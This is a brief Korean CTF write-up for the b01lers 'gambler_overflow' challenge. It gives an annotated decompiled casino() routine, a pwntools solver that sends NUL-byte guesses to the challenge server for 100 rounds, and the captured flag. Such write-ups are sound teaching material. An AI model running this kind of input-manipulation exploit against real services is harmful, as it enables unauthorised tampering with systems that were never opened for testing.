1. 문제
overflow를 사용했습니다. 입력을 모두 null 바이트로 채웠습니다.
/*
 * Decompiled (Ghidra-style) listing of the challenge's casino() routine.
 * Plays rounds of a four-letter guessing game against a global coin balance
 * and calls give_flag() once the balance reaches 1000 coins.
 * The globals balance, bet_win and bet_loss, and give_flag(), are defined
 * elsewhere in the binary and are not part of this listing.
 */
void casino(void)
{
    int iVar1;          /* scratch: holds rand() and strcmp() results */
    long in_FS_OFFSET;  /* decompiler artefact: base of the fs segment (canary at +0x28) */
    int local_24;       /* index into the generated word */
    char local_20 [8];  /* the correct word: 4 random lowercase letters, NUL padded */
    char local_18 [8];  /* the player's guess as read by fgets() */
    long local_10;      /* saved stack-protector canary */
    /* Stack-protector prologue: save the canary for the check at the end. */
    local_10 = *(long *)(in_FS_OFFSET + 0x28);
    puts("Welcome to the casino! A great prize awaits you when you hit 1000 coins ;)");
    memset(local_20,0,8);
    memset(local_18,0,8);
    do {
        /* Leave as soon as the balance is used up. balance is compared through an
         * (int) cast but passed to printf as (ulong) below, so it is presumably an
         * unsigned global -- NOTE(review): confirm its declaration in the binary.
         * The %d / (ulong) pairing is a format mismatch as written here. */
        if ((int)balance < 1) goto LAB_001016b3;
        printf("Your current balance: %d\n",(ulong)balance);
        /* Build the word to guess: each byte works out to rand() % 26 + 'a' (the
         * decompiler renders the modulo as a subtract of (x / 26) * 26). No srand()
         * call is visible in this function, so any seeding happens elsewhere --
         * NOTE(review): an unseeded generator yields the same word sequence on
         * every run; verify in the caller. */
        local_24 = 0;
        while (local_24 < 4) {
            iVar1 = rand();
            local_20[local_24] = (char)iVar1 + (char)(iVar1 / 0x1a) * -0x1a + 'a';
            local_24 = local_24 + 1;
        }
        printf("Guess me a string of length 4 with lowercase letters: ");
        /* Reads at most 4 bytes into the 8-byte guess buffer and NUL-terminates.
         * fgets() stores NUL bytes from the input as-is; it stops only at a
         * newline or EOF. getchar() then drains one more byte (presumably the
         * trailing newline). */
        fgets(local_18,5,stdin);
        getchar();
        printf("Your guess: %s\n",local_18);
        /* The correct word is revealed only after the guess has been read. */
        printf("Correct word: %s\n",local_20);
        iVar1 = strcmp(local_20,local_18);
        if (iVar1 == 0) {
            printf("You won (wow)! +%d coins.\n",(ulong)bet_win);
            balance = bet_win + balance;
        }
        else {
            printf("Bummer, you lost. -%d coins.\n",(ulong)bet_loss);
            balance = balance - bet_loss;
        }
        /* Bankruptcy check after a loss, again through a signed cast. If balance
         * is unsigned, a subtraction past zero wraps rather than going negative;
         * whether every wrapped value reads as negative here depends on the size
         * of bet_loss, which is not shown in this listing. */
        if ((int)balance < 0) {
            puts("You lost your entire balance! Better luck next time...");
            goto LAB_001016b3;
        }
    } while ((int)balance < 1000);
    /* Reached only by leaving the loop with (int)balance >= 1000. */
    give_flag();
LAB_001016b3:
    puts("See you next time!");
    /* Stack-protector epilogue: abort if the saved canary was overwritten. */
    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
        /* WARNING: Subroutine does not return */
        __stack_chk_fail();
    }
    return;
}
2. 풀이
# -*- coding: utf-8 -*-
# Solver script for the b01lers CTF "gambler_overflow" service: connect,
# answer each guess prompt with eight NUL bytes, then dump whatever the
# service prints before it closes the connection.
from pwn import *

# Debug-level logging so every byte sent and received is shown.
context.log_level = 'debug'

# Remote connection (the nc equivalent).
p = remote('ctf.b01lers.com', 9202)

# The guess sent on every round: eight NUL bytes.
NULL_GUESS = "\x00" * 8

# Play 100 rounds, waiting for the prompt before each answer.
round_no = 0
while round_no < 100:
    prompt = p.recvuntil("lowercase letters:")
    print('message', prompt)
    p.sendline(NULL_GUESS)
    round_no += 1

# Read the remaining output until the service hangs up.
result = p.recvall()
print('result', result)
3. flag
bctf{n0_pr4153_f0r_RNGesus}